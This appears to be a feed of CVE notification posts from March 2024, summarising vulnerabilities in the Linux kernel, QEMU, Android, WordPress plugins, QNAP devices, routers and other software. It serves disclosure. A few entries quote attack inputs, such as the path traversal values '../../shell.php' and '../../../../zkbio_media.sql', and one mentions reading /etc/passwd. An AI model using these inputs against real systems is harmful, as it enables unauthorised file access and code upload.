🚨 CVE-2024-26584In the Linux kernel, the following vulnerability has been resolved:net: tls: handle backlogging of crypto requestsSince we're setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on ourrequests to the crypto API, crypto_aead_{encrypt,decrypt} can return -EBUSY instead of -EINPROGRESS in valid situations. For example, whenthe cryptd queue for AESNI is full (easy to trigger with anartificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueuedto the backlog but still processed. In that case, the async callbackwill also be called twice: first with err == -EINPROGRESS, which itseems we can just ignore, then with err == 0.Compared to Sabrina's original patch this version uses the newtls_*crypt_async_wait() helpers and converts the EBUSY toEINPROGRESS to avoid having to modify all the error handlingpaths. The handling is identical.🎖@cveNotify |
|
| 2024-03-11 18:37:32 |
🚨 CVE-2023-5088A bug in QEMU could cause a guest I/O operation otherwise addressed to an arbitrary disk offset to be targeted to offset 0 instead (potentially overwriting the VM's boot code). This could be used, for example, by L2 guests with a virtual disk (vdiskL2) stored on a virtual disk of an L1 (vdiskL1) hypervisor to read and/or write data to LBA 0 of vdiskL1, potentially gaining control of L1 at its next reboot.🎖@cveNotify |
|
| 2024-03-11 18:37:31 |
🚨 CVE-2023-3354A flaw was found in the QEMU built-in VNC server. When a client connects to the VNC server, QEMU checks whether the current number of connections crosses a certain threshold and if so, cleans up the previous connection. If the previous connection happens to be in the handshake phase and fails, QEMU cleans up the connection again, resulting in a NULL pointer dereference issue. This could allow a remote unauthenticated client to cause a denial of service.🎖@cveNotify |
|
| 2024-03-11 17:37:42 |
🚨 CVE-2024-0052In multiple functions of healthconnect, there is a possible leakage of exercise route data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 17:37:36 |
🚨 CVE-2024-0051In onQueueFilled of SoftMPEG4.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 17:37:35 |
🚨 CVE-2024-0048In Session of AccountManagerService.java, there is a possible method to retain foreground service privileges due to incorrect handling of null responses. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 17:37:34 |
🚨 CVE-2024-0047In writeUserLP of UserManagerService.java, device policies are serialized with an incorrect tag due to a logic error in the code. This could lead to local denial of service when policies are deserialized on reboot with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 17:37:30 |
🚨 CVE-2024-0045In smp_proc_sec_req of smp_act.cc, there is a possible out of bounds read due to improper input validation. This could lead to remote (proximal/adjacent) information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 17:37:29 |
🚨 CVE-2023-40081In loadMediaDataInBgForResumption of MediaDataManager.kt, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 15:38:02 |
🚨 CVE-2024-0670Privilege escalation in windows agent plugin in Checkmk before 2.2.0p23, 2.1.0p40 and 2.0.0 (EOL) allows local user to escalate privileges🎖@cveNotify |
|
| 2024-03-11 15:38:01 |
🚨 CVE-2024-27198In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible🎖@cveNotify |
|
| 2024-03-11 14:37:37 |
🚨 CVE-2024-1441An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.🎖@cveNotify |
|
| 2024-03-11 13:38:04 |
🚨 CVE-2023-52356A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service.🎖@cveNotify |
|
| 2024-03-11 13:38:03 |
🚨 CVE-2023-3576A memory leak flaw was found in Libtiff's tiffcrop utility. This issue occurs when tiffcrop operates on a TIFF image file, allowing an attacker to pass a crafted TIFF image file to tiffcrop utility, which causes this memory leak issue, resulting an application crash, eventually leading to a denial of service.🎖@cveNotify |
|
| 2024-03-11 13:07:42 |
🚨 CVE-2024-28823Amazon AWS aws-js-s3-explorer (aka AWS JavaScript S3 Explorer) 1.0.0 allows XSS via a crafted S3 bucket name to index.html.🎖@cveNotify |
|
| 2024-03-11 13:07:41 |
🚨 CVE-2024-28816Student Information Chatbot a0196ab allows SQL injection via the username to the login function in index.php.🎖@cveNotify |
|
| 2024-03-11 11:37:40 |
🚨 CVE-2023-7216A path traversal vulnerability was found in the CPIO utility. This issue could allow a remote unauthenticated attacker to trick a user into opening a specially crafted archive. During the extraction process, the archiver could follow symlinks outside of the intended directory, this allows writing files in arbitrary directories through symlinks.🎖@cveNotify |
|
| 2024-03-11 05:37:26 |
🚨 CVE-2024-28823Amazon AWS aws-js-s3-explorer (aka AWS JavaScript S3 Explorer) 1.0.0 allows XSS via a crafted S3 bucket name to index.html.🎖@cveNotify |
|
| 2024-03-11 03:37:25 |
🚨 CVE-2024-28816Student Information Chatbot a0196ab allows SQL injection via the username to the login function in index.php.🎖@cveNotify |
|
| 2024-03-11 02:37:32 |
🚨 CVE-2024-1048A flaw was found in the grub2-set-bootflag utility of grub2. After the fix of CVE-2019-14865, grub2-set-bootflag will create a temporary file with the new grubenv content and rename it to the original grubenv file. If the program is killed before the rename operation, the temporary file will not be removed and may fill the filesystem when invoked multiple times, resulting in a filesystem out of free inodes or blocks.🎖@cveNotify |
|
| 2024-03-11 01:37:45 |
🚨 CVE-2023-46427An issue was discovered in gpac version 2.3-DEV-rev588-g7edc40fee-master, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via null pointer deference in gf_dash_setup_period component in media_tools/dash_client.c.🎖@cveNotify |
|
| 2024-03-11 01:37:39 |
🚨 CVE-2023-46426Heap-based Buffer Overflow vulnerability in gpac version 2.3-DEV-rev588-g7edc40fee-master, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) via gf_fwrite component in at utils/os_file.c.🎖@cveNotify |
|
| 2024-03-11 01:37:38 |
🚨 CVE-2023-49340An issue was discovered in Newland Nquire 1000 Interactive Kiosk version NQ1000-II_G_V1.00.011, allows remote attackers to escalate privileges and bypass authentication via incorrect access control in the web management portal.🎖@cveNotify |
|
| 2024-03-11 01:37:37 |
🚨 CVE-2024-28184WeasyPrint helps web developers to create PDF documents. Since version 61.0, there's a vulnerability which allows attaching content of arbitrary files and URLs to a generated PDF document, even if `url_fetcher` is configured to prevent access to files and URLs. This vulnerability has been patched in version 61.2.🎖@cveNotify |
|
| 2024-03-11 01:37:33 |
🚨 CVE-2024-28122JWX is Go module implementing various JWx (JWA/JWE/JWK/JWS/JWT, otherwise known as JOSE) technologies. This vulnerability allows an attacker with a trusted public key to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. This issue has been patched in versions 1.2.29 and 2.0.21.🎖@cveNotify |
|
| 2024-03-11 01:37:32 |
🚨 CVE-2024-28753RaspAP (aka raspap-webgui) through 3.0.9 allows remote attackers to read the /etc/passwd file via a crafted request.🎖@cveNotify |
|
| 2024-03-11 00:37:25 |
🚨 CVE-2024-2365A vulnerability classified as problematic was found in Musicshelf 1.0/1.1 on Android. Affected by this vulnerability is an unknown functionality of the file io\fabric\sdk\android\services\network\PinningTrustManager.java of the component SHA-1 Handler. The manipulation leads to password hash with insufficient computational effort. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-256321 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-10 23:37:25 |
🚨 CVE-2024-2314If kernel headers need to be extracted, bcc will attempt to load them from a temporary directory. An unprivileged attacker could use this to force bcc to load compromised linux headers. Linux distributions which provide kernel headers by default are not affected by default.🎖@cveNotify |
|
| 2024-03-10 23:37:24 |
🚨 CVE-2024-2313If kernel headers need to be extracted, bpftrace will attempt to load them from a temporary directory. An unprivileged attacker could use this to force bcc to load compromised linux headers. Linux distributions which provide kernel headers by default are not affected by default.🎖@cveNotify |
|
| 2024-03-10 12:37:25 |
🚨 CVE-2024-2355A vulnerability has been found in keerti1924 Secret-Coder-PHP-Project 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /secret_coder.sql. The manipulation leads to inclusion of sensitive information in source code. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256315. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-10 12:37:24 |
🚨 CVE-2023-0943A vulnerability, which was classified as problematic, has been found in SourceCodester Best POS Management System 1.0. This issue affects the function save_settings of the file index.php?page=site_settings of the component Image Handler. The manipulation of the argument img with the input ../../shell.php leads to unrestricted upload. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-221591.🎖@cveNotify |
|
| 2024-03-10 11:37:24 |
🚨 CVE-2024-2354A vulnerability, which was classified as problematic, was found in Dreamer CMS 4.1.3. Affected is an unknown function of the file /admin/menu/toEdit. The manipulation of the argument id leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-10 08:37:24 |
🚨 CVE-2024-2353A vulnerability, which was classified as critical, has been found in Totolink X6000R 9.4.0cu.852_20230719. This issue affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. The manipulation of the argument ip leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256313 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-10 05:37:24 |
🚨 CVE-2024-28757libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate).🎖@cveNotify |
|
| 2024-03-10 04:37:25 |
🚨 CVE-2023-52160The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks.🎖@cveNotify |
|
| 2024-03-10 04:37:24 |
🚨 CVE-2023-39325A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing. With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection. This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2. The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.🎖@cveNotify |
|
| 2024-03-10 02:37:24 |
🚨 CVE-2024-2057A vulnerability was found in Harrison Chase LangChain 0.1.9. It has been classified as critical. Affected is the function load_local in the library libs/community/langchain_community/retrievers/tfidf.py. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255372.🎖@cveNotify |
|
| 2024-03-09 17:37:25 |
🚨 CVE-2024-2275A vulnerability, which was classified as problematic, was found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0. Affected is an unknown function of the component OBS Patient/Gynee Prescription. The manipulation of the argument Patient Title/Full Name/Address/Cheif Complain/LMP/Menstrual Edd/OBS P/OBS Alc/Medicine Name/Medicine Type/Ml/Dose/Days/Comments/Template Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256044. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-09 17:37:24 |
🚨 CVE-2024-2274A vulnerability, which was classified as problematic, has been found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0. This issue affects some unknown processing of the file /Home/Index of the component Prescription Dashboard. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256043. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-09 16:37:24 |
🚨 CVE-2024-2333A vulnerability classified as critical has been found in CodeAstro Membership Management System 1.0. Affected is an unknown function of the file /add_members.php. The manipulation of the argument fullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256284.🎖@cveNotify |
|
| 2024-03-09 14:37:24 |
🚨 CVE-2024-2332A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/maintenance/manage_category.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256283.🎖@cveNotify |
|
| 2024-03-09 10:37:25 |
🚨 CVE-2024-2331A vulnerability was found in SourceCodester Tourist Reservation System 1.0. It has been declared as critical. This vulnerability affects the function ad_writedata of the file System.cpp. The manipulation of the argument ad_code leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256282 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-09 10:37:24 |
🚨 CVE-2024-1870The Colibri Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the callActivateLicenseEndpoint function in all versions up to, and including, 1.0.260. This makes it possible for authenticated attackers, with subscriber access or higher, to update the license key.🎖@cveNotify |
|
| 2024-03-09 09:37:24 |
🚨 CVE-2024-2330A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256281 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-09 08:37:25 |
🚨 CVE-2024-2329A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/list_resource_icon.php?action=delete. The manipulation of the argument IconId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256280. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-09 08:37:24 |
🚨 CVE-2024-26450An issue exists within Piwigo before v.14.2.0 allowing a malicious user to take over the application. This exploit involves chaining a Cross Site Request Forgery vulnerability to issue a Stored Cross Site Scripting payload stored within an Admin user's dashboard, executing remote JavaScript. This can be used to upload a new PHP file under an administrator and directly call that file from the victim's instance to connect back to a malicious listener.🎖@cveNotify |
|
| 2024-03-09 07:37:29 |
🚨 CVE-2024-28089Hitron CODA-4582 2AHKM-CODA4589 7.2.4.5.1b8 devices allow a remote attacker within Wi-Fi proximity (who has access to the router admin panel) to conduct a DOM-based stored XSS attack that can fetch remote resources. The payload is executed at index.html#advanced_location (aka the Device Location page). This can cause a denial of service or lead to information disclosure.🎖@cveNotify |
|
| 2024-03-09 07:37:26 |
🚨 CVE-2024-1767The Blocksy theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.0.26 due to insufficient input sanitization and output escaping on user supplied attributes like 'className' and 'radius'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-09 07:37:25 |
🚨 CVE-2024-1124The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the ep_send_attendees_email() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to send arbitrary emails with arbitrary content from the site.🎖@cveNotify |
|
| 2024-03-09 07:37:24 |
🚨 CVE-2024-1123The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_frontend_event_submission() function in all versions up to, and including, 3.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the title and content of arbitrary posts. This can also be exploited by unauthenticated attackers when the allow_submission_by_anonymous_user setting is enabled.🎖@cveNotify |
|
| 2024-03-09 06:37:25 |
🚨 CVE-2024-25951A command injection vulnerability exists in local RACADM. A malicious authenticated user could gain control of the underlying operating system.🎖@cveNotify |
|
| 2024-03-09 06:37:24 |
🚨 CVE-2023-46426Heap-based Buffer Overflow vulnerability in gpac version 2.3-DEV-rev588-g7edc40fee-master, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) via gf_fwrite component in at utils/os_file.c.🎖@cveNotify |
|
| 2024-03-09 05:37:25 |
🚨 CVE-2023-49341An issue was discovered in Newland Nquire 1000 Interactive Kiosk version NQ1000-II_G_V1.00.011, allows remote attackers to obtain sensitive information via cleartext credential storage in backup.htm component.🎖@cveNotify |
|
| 2024-03-09 05:37:24 |
🚨 CVE-2023-49340An issue was discovered in Newland Nquire 1000 Interactive Kiosk version NQ1000-II_G_V1.00.011, allows remote attackers to escalate privileges and bypass authentication via incorrect access control in the web management portal.🎖@cveNotify |
|
| 2024-03-09 01:37:25 |
🚨 CVE-2024-28176jose is JavaScript module for JSON Object Signing and Encryption, providing support for JSON Web Tokens (JWT), JSON Web Signature (JWS), JSON Web Encryption (JWE), JSON Web Key (JWK), JSON Web Key Set (JWKS), and more. A vulnerability has been identified in the JSON Web Encryption (JWE) decryption interfaces, specifically related to the support for decompressing plaintext after its decryption. Under certain conditions it is possible to have the user's environment consume unreasonable amount of CPU time or memory during JWE Decryption operations. This issue has been patched in versions 2.0.7 and 4.15.5.🎖@cveNotify |
|
| 2024-03-09 01:37:24 |
🚨 CVE-2024-28122JWX is Go module implementing various JWx (JWA/JWE/JWK/JWS/JWT, otherwise known as JOSE) technologies. This vulnerability allows an attacker with a trusted public key to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. This issue has been patched in versions 1.2.29 and 2.0.21.🎖@cveNotify |
|
| 2024-03-09 00:37:25 |
🚨 CVE-2024-28754RaspAP (aka raspap-webgui) through 3.0.9 allows remote attackers to cause a persistent denial of service (bricking) via a crafted request.🎖@cveNotify |
|
| 2024-03-09 00:37:24 |
🚨 CVE-2024-28753RaspAP (aka raspap-webgui) through 3.0.9 allows remote attackers to read the /etc/passwd file via a crafted request.🎖@cveNotify |
|
| 2024-03-08 21:37:32 |
🚨 CVE-2024-21899An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to compromise the security of the system via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.3.2578 build 20231110 and laterQTS 4.5.4.2627 build 20231225 and laterQuTS hero h5.1.3.2578 build 20231110 and laterQuTS hero h4.5.4.2626 build 20231225 and laterQuTScloud c5.1.5.2651 and later🎖@cveNotify |
|
| 2024-03-08 21:37:25 |
🚨 CVE-2023-32969A cross-site scripting (XSS) vulnerability has been reported to affect Network & Virtual Switch. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network.We have already fixed the vulnerability in the following versions:QuTScloud c5.1.5.2651 and laterQTS 5.1.4.2596 build 20231128 and laterQuTS hero h5.1.4.2596 build 20231128 and later🎖@cveNotify |
|
| 2024-03-08 21:37:24 |
🚨 CVE-2024-26472KLiK SocialMediaWebsite version 1.0.1 from msaad1999 has a reflected cross-site scripting (XSS) vulnerability which may allow remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the 'selector' or 'validator' parameters of 'create-new-pwd.php'.🎖@cveNotify |
|
| 2024-03-08 20:37:25 |
🚨 CVE-2024-2339PostgreSQL Anonymizer v1.2 contains a vulnerability that allows a user who owns a table to elevate to superuser. A user can define a masking function for a column and place malicious code in that function. When a privileged user applies the masking rules using the static masking or the anonymous dump method, the malicious code is executed and can grant escalated privileges to the malicious user. PostgreSQL Anonymizer v1.2 does provide a protection against this risk with the restrict_to_trusted_schemas option, but that protection is incomplete. Users that don't own a table, especially masked users cannot exploit this vulnerability. The problem is resolved in v1.3.🎖@cveNotify |
|
| 2024-03-08 20:37:24 |
🚨 CVE-2024-2338PostgreSQL Anonymizer v1.2 contains a SQL injection vulnerability that allows a user who owns a table to elevate to superuser when dynamic masking is enabled. PostgreSQL Anonymizer enables users to set security labels on tables to mask specified columns. There is a flaw that allows complex expressions to be provided as a value. This expression is then later used as it to create the masked views leading to SQL Injection. If dynamic masking is enabled, this will lead to privilege escalation to superuser after the label is created. Users that don't own a table, especially masked users cannot exploit this vulnerability. The problem is resolved in v1.3.🎖@cveNotify |
|
| 2024-03-08 20:07:25 |
🚨 CVE-2023-4693An out-of-bounds read flaw was found on grub2's NTFS filesystem driver. This issue may allow a physically present attacker to present a specially crafted NTFS file system image to read arbitrary memory locations. A successful attack allows sensitive data cached in memory or EFI variable values to be leaked, presenting a high Confidentiality risk.🎖@cveNotify |
|
| 2024-03-08 20:07:24 |
🚨 CVE-2023-4692An out-of-bounds write flaw was found in grub2's NTFS filesystem driver. This issue may allow an attacker to present a specially crafted NTFS filesystem image, leading to grub's heap metadata corruption. In some circumstances, the attack may also corrupt the UEFI firmware heap metadata. As a result, arbitrary code execution and secure boot protection bypass may be achieved.🎖@cveNotify |
|
| 2024-03-08 19:37:32 |
🚨 CVE-2024-23278The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to break out of its sandbox.🎖@cveNotify |
|
| 2024-03-08 19:37:31 |
🚨 CVE-2024-23231A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-03-08 19:37:27 |
🚨 CVE-2024-23203The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user.🎖@cveNotify |
|
| 2024-03-08 19:37:26 |
🚨 CVE-2022-29235BigBlueButton is an open source web conferencing system. Starting in version 2.2 and prior to versions 2.3.18 and 2.4-rc-6, an attacker who is able to obtain the meeting identifier for a meeting on a server can find information related to an external video being shared, like the current timestamp and play/pause. The problem has been patched in versions 2.3.18 and 2.4-rc-6 by modifying the stream to send the data only for users in the meeting. There are currently no known workarounds.🎖@cveNotify |
|
| 2024-03-08 19:37:25 |
🚨 CVE-2022-29234BigBlueButton is an open source web conferencing system. Starting in version 2.2 and prior to versions 2.3.18 and 2.4.1, an attacker could send messages to a locked chat within a grace period of 5s any lock setting in the meeting was changed. The attacker needs to be a participant in the meeting. Versions 2.3.18 and 2.4.1 contain a patch for this issue. There are currently no known workarounds.🎖@cveNotify |
|
| 2024-03-08 18:37:25 |
🚨 CVE-2023-38559A buffer overflow flaw was found in base/gdevdevn.c:1973 in devn_pcx_write_rle() in ghostscript. This issue may allow a local attacker to cause a denial of service via outputting a crafted PDF file for a DEVN device with gs.🎖@cveNotify |
|
| 2024-03-08 18:07:32 |
🚨 CVE-2023-6693A stack based buffer overflow was found in the virtio-net device of QEMU. This issue occurs when flushing TX in the virtio_net_flush_tx function if guest features VIRTIO_NET_F_HASH_REPORT, VIRTIO_F_VERSION_1 and VIRTIO_NET_F_MRG_RXBUF are enabled. This could allow a malicious user to overwrite local variables allocated on the stack. Specifically, the `out_sg` variable could be used to read a part of process memory and send it to the wire, causing an information leak.🎖@cveNotify |
|
| 2024-03-08 17:37:30 |
🚨 CVE-2024-21901A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network.We have already fixed the vulnerability in the following versions:myQNAPcloud 1.0.52 ( 2023/11/24 ) and laterQTS 4.5.4.2627 build 20231225 and later🎖@cveNotify |
|
| 2024-03-08 17:37:29 |
🚨 CVE-2024-21900An injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.3.2578 build 20231110 and laterQuTS hero h5.1.3.2578 build 20231110 and laterQuTScloud c5.1.5.2651 and later🎖@cveNotify |
|
| 2024-03-08 17:37:25 |
🚨 CVE-2023-34980An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.We have already fixed the vulnerability in the following versions:QTS 4.5.4.2627 build 20231225 and laterQuTS hero h4.5.4.2626 build 20231225 and later🎖@cveNotify |
|
| 2024-03-08 17:37:24 |
🚨 CVE-2023-34975An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.QuTScloud c5.1.x is not affected.We have already fixed the vulnerability in the following versions:QuTS hero h4.5.4.2626 build 20231225 and laterQTS 4.5.4.2627 build 20231225 and later🎖@cveNotify |
|
| 2024-03-08 16:37:30 |
🚨 CVE-2023-40834OpenCart CMS v4.0.2.2 was discovered to lack a protective mechanism on its login page against excessive login attempts, allowing unauthenticated attackers to gain access to the application via a brute force attack to the password parameter.🎖@cveNotify |
|
| 2024-03-08 14:37:38 |
🚨 CVE-2024-2319Cross-Site Scripting (XSS) vulnerability in the Django MarkdownX project, affecting version 4.0.2. An attacker could store a specially crafted JavaScript payload in the upload functionality due to lack of proper sanitisation of JavaScript elements.🎖@cveNotify |
|
| 2024-03-08 14:37:32 |
🚨 CVE-2023-25395TOTOlink A7100RU V7.4cu.2313_B20191024 router was discovered to contain a command injection vulnerability via the ou parameter at /setting/delStaticDhcpRules.🎖@cveNotify |
|
| 2024-03-08 14:37:31 |
🚨 CVE-2023-25304An issue in Prism Launcher up to v6.1 allows attackers to perform a directory traversal via importing a crafted .mrpack file.🎖@cveNotify |
|
| 2024-03-08 14:37:30 |
🚨 CVE-2023-22975A cross-site scripting (XSS) vulnerability in JFinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter under /front/person/profile.html.🎖@cveNotify |
|
| 2024-03-08 14:07:42 |
🚨 CVE-2024-1725A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.🎖@cveNotify |
|
| 2024-03-08 14:07:36 |
🚨 CVE-2024-0203The Digits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.1. This is due to missing nonce validation in the 'digits_save_settings' function. This makes it possible for unauthenticated attackers to modify the default role of registered users to elevate user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-08 14:07:35 |
🚨 CVE-2024-1442A user with the permissions to create a data source can use Grafana API to create a data source with UID set to *.Doing this will grant the user access to read, query, edit and delete all data sources within the organization.🎖@cveNotify |
|
| 2024-03-08 14:07:34 |
🚨 CVE-2024-27733File Upload vulnerability in Byzro Network Smart s42 Management Platform v.S42 allows a local attacker to execute arbitrary code via the useratte/userattestation.php component.🎖@cveNotify |
|
| 2024-03-08 14:07:31 |
🚨 CVE-2023-48725A stack-based buffer overflow vulnerability exists in the JSON Parsing getblockschedule() functionality of Netgear RAX30 1.0.11.96 and 1.0.7.78. A specially crafted HTTP request can lead to code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-03-08 14:07:30 |
🚨 CVE-2023-42661JFrog Artifactory prior to version 7.76.2 is vulnerable to Arbitrary File Write of untrusted data, which may lead to DoS or Remote Code Execution when a specially crafted series of requests is sent by an authenticated user. This is due to insufficient validation of artifacts.🎖@cveNotify |
|
| 2024-03-08 14:07:29 |
🚨 CVE-2023-42509JFrog Artifactory later than version 7.17.4 but prior to version 7.77.0 is vulnerable to an issue whereby a sequence of improperly handled exceptions in repository configuration initialization steps may lead to exposure of sensitive data.🎖@cveNotify |
|
| 2024-03-08 13:37:39 |
🚨 CVE-2024-2318A vulnerability was found in ZKTeco ZKBio Media 2.0.0_x64_2024-01-29-1028. It has been classified as problematic. Affected is an unknown function of the file /pro/common/download of the component Service Port 9999. The manipulation of the argument fileName with the input ../../../../zkbio_media.sql leads to path traversal: '../filedir'. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-08 13:37:35 |
🚨 CVE-2023-40930An issue in the directory /system/bin/blkid of Skyworth v3.0 allows attackers to perform a directory traversal via mounting the Udisk to /mnt/.🎖@cveNotify |
|
| 2024-03-08 13:37:34 |
🚨 CVE-2022-47872A Server-Side Request Forgery (SSRF) in maccms10 v2021.1000.2000 allows attackers to force the application to make arbitrary requests via a crafted payload injected into the Name parameter under the Interface address module.🎖@cveNotify |
|
| 2024-03-08 13:37:33 |
